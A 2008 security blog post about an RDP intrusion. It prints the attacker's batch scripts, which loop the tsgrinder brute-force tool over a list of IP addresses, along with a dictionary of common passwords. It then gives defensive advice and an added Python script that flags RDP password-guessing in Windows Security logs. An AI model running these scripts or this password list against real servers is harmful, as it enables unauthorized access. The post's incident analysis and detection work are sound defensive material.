Monday, June 23, 2008 7:00 PM
bradley
Unfettered access to port 3389
I'm reading this post and it's talking about how to run the wizard for VPN but at the end, is it just me or does it suddenly change over to using straight RDP to the server?
Configure Windows Small Business Server 2003 R2 Remote Access | Tech of all Trades | TechRepublic.com:
http://blogs.techrepublic.com.com/techofalltrades/?p=158
Here's why unfettered access to port 3389 is a bad thing.
(Keep in mind that when I show you this, by the time this software was placed on the server, the initial intrusion had already occurred (full investigation still pending on that), and I had already shut off key elements of the site/servers, ensuring that the bad software was limited. Thus the only reason the box was still running was to get log files off the system. [And yes, the reason it was offline for 4 days was to arrange to keep the log files and evidence for later review.])
With that said... this is why you don't want unfettered access to RDP.
In the c:\recycler\T folder on the server were several files. One of them, Startscan.bat, launched a command window.
(Apologies for the swear words)

The code looks like this:
@echo off
echo +-----------------------------------------------+
echo ¦ Terminal Service Auto Hacker ¦
echo ¦ Coded by OscarHS ¦
echo ¦-----------------------------------------------¦
echo ¦ Copyright © 2006 Natural Alliance ¦
echo ¦ ¦
echo +-----------------------------------------------+
echo.
echo.
echo Lets own some sh_t!...
@echo off
for /f "eol=; tokens=1*" %%i in (scan.txt) do call scan.bat %%i
echo Exploiting done...
pause
In the file Scan.bat the contents were as follows:
@echo off
echo "#################################" >> results.txt
echo %1 >> results.txt
tsgrinder.exe -n 2 %1 >> results.txt
echo "#################################" >> results.txt
For those of you unaware of what TSgrinder.exe is, it's a brute force Terminal Server attack tool.
In the Scan.txt file was a list of IP addresses.
Finally in a file called dict was the following:
let!yoda!in!
administrator
passwd
123456
12345678
123456789
111111
11111111
000000
88888888
123123
666666
00000000
1234567
888888
admin
asdf
asdfgh
root
server
1
111
123
1234
654321
!@#$
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
abc
abc123
password
pass
So let's analyze what this was trying/intending to do: drop onto the box, run a script that brute-forces RDP against each address listed in scan.txt, and while at it try the preconfigured passwords from the dict file.
Now there are several approaches to defending against brute-force attacks like this.
1. Change the port to something other than port 3389.
Pro: Some folks argue that using an alternative port means you will be left out of automated attacks.
Con: RDP traffic can still be sniffed. Make sure you are not getting a false sense of security.
2. Ensure that the port is blocked or protected.
Pro: The options range from two-factor authentication such as www.authanvil.com for the most secure solution, to requiring a VPN connection to be brought up first, to at the very least configuring the firewall so it only allows RDP from certain specific sources. Each of these limits your exposure and also limits the log file review/attention you have to do.
Con: You may not have a static IP, VPN ports may be blocked, and you must have the key fob with you at all times.
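Whichever of the approaches above you pick, the log files are what tell you afterwards whether a tool like this was run against you. The following is an added example, not code from the original post or from the tool's author: it reads an exported Security log, flags any source IP that racks up repeated failed Terminal Services logons within a few minutes (the pattern a dictionary run like the one above produces), and records whether the same source later logged on successfully, which is the line in the log you most need to find. The CSV export layout, the log lines and the IP addresses are constructed for the example; the event IDs (529/528 on Windows 2003, 4625/4624 on later versions) and logon type 10 are the standard Windows ones.

```python
# Added example: spot RDP password-guessing bursts in an exported Windows
# Security log.  Not from the original post.  The CSV layout
# (timestamp,event_id,account,logon_type,src_ip) is an assumed export format,
# and every log line, account name and IP address below is constructed.
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Windows 2003 era audit IDs: 529 = bad user name or password, 528 = successful
# logon.  Vista/2008 and later use 4625 and 4624.  Logon type 10 is
# RemoteInteractive, i.e. Terminal Services / RDP.
FAILED_LOGON_IDS = {"529", "4625"}
SUCCESS_LOGON_IDS = {"528", "4624"}
RDP_LOGON_TYPE = "10"

# Constructed sample export: one source guessing several accounts over RDP and
# then getting in, one user mistyping a password once, and a service account
# failing over a network logon (type 3), which is not RDP and must be ignored.
SAMPLE_LOG = """\
2008-06-23 19:00:01,529,administrator,10,203.0.113.45
2008-06-23 19:00:02,529,administrator,10,203.0.113.45
2008-06-23 19:00:03,529,administrator,10,203.0.113.45
2008-06-23 19:00:04,529,admin,10,203.0.113.45
2008-06-23 19:00:05,529,root,10,203.0.113.45
2008-06-23 19:00:06,529,server,10,203.0.113.45
2008-06-23 19:00:07,528,administrator,10,203.0.113.45
2008-06-23 19:05:00,529,jsmith,10,198.51.100.7
2008-06-23 19:05:20,528,jsmith,10,198.51.100.7
2008-06-23 19:10:00,529,svc_backup,3,192.0.2.9
2008-06-23 19:11:00,529,svc_backup,3,192.0.2.9
2008-06-23 19:12:00,529,svc_backup,3,192.0.2.9
2008-06-23 19:13:00,529,svc_backup,3,192.0.2.9
2008-06-23 19:14:00,529,svc_backup,3,192.0.2.9
2008-06-23 19:15:00,529,svc_backup,3,192.0.2.9
"""


def parse_line(line):
    """Split one exported record into its fields."""
    ts, event_id, account, logon_type, src_ip = line.strip().split(",")
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
        "event_id": event_id,
        "account": account.lower(),
        "logon_type": logon_type,
        "src_ip": src_ip,
    }


def find_rdp_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: alert} for every source that produced at least
    `threshold` failed RDP logons inside any span of length `window`.
    Each alert also records a later successful RDP logon from the same source,
    the sign that one of the guesses may have worked."""
    recent = defaultdict(deque)   # src_ip -> failure timestamps still inside the window
    accounts = defaultdict(set)   # src_ip -> account names tried
    alerts = {}                   # src_ip -> alert dict
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue                            # only Terminal Services logons
        ip = ev["src_ip"]
        if ev["event_id"] in FAILED_LOGON_IDS:
            q = recent[ip]
            q.append(ev["ts"])
            accounts[ip].add(ev["account"])
            while ev["ts"] - q[0] > window:    # slide the window forward
                q.popleft()
            if ip in alerts:
                alerts[ip]["last"] = ev["ts"]
                alerts[ip]["failures"] += 1
            elif len(q) >= threshold:
                alerts[ip] = {"first": q[0], "last": ev["ts"], "failures": len(q),
                              "accounts": accounts[ip], "success_after": None}
        elif ev["event_id"] in SUCCESS_LOGON_IDS and ip in alerts:
            # A success from a source already flagged for guessing is the
            # record an incident responder needs to see first.
            alerts[ip]["success_after"] = (ev["account"], ev["ts"])
    return alerts


if __name__ == "__main__":
    for ip, a in find_rdp_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {a['failures']} failed RDP logons {a['first']} .. {a['last']}, "
              f"accounts tried: {sorted(a['accounts'])}")
        if a["success_after"]:
            print(f"  !! successful logon as {a['success_after'][0]} at {a['success_after'][1]}")
```

The window is sliding, so a source that spaces its guesses out over hours stays below the threshold; lowering `threshold` or widening `window` trades that miss for more noise from users who simply mistype. Filtering on logon type 10 is what keeps network and service logons out of the count, so on a server where RDP is only expected from the LAN, any alert at all is worth reading through.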
But seriously, after looking at that tool by Oscar... don't you want to be a bit more protected from that?
So make sure that port is at least a tad bit protected.
Filed under: Security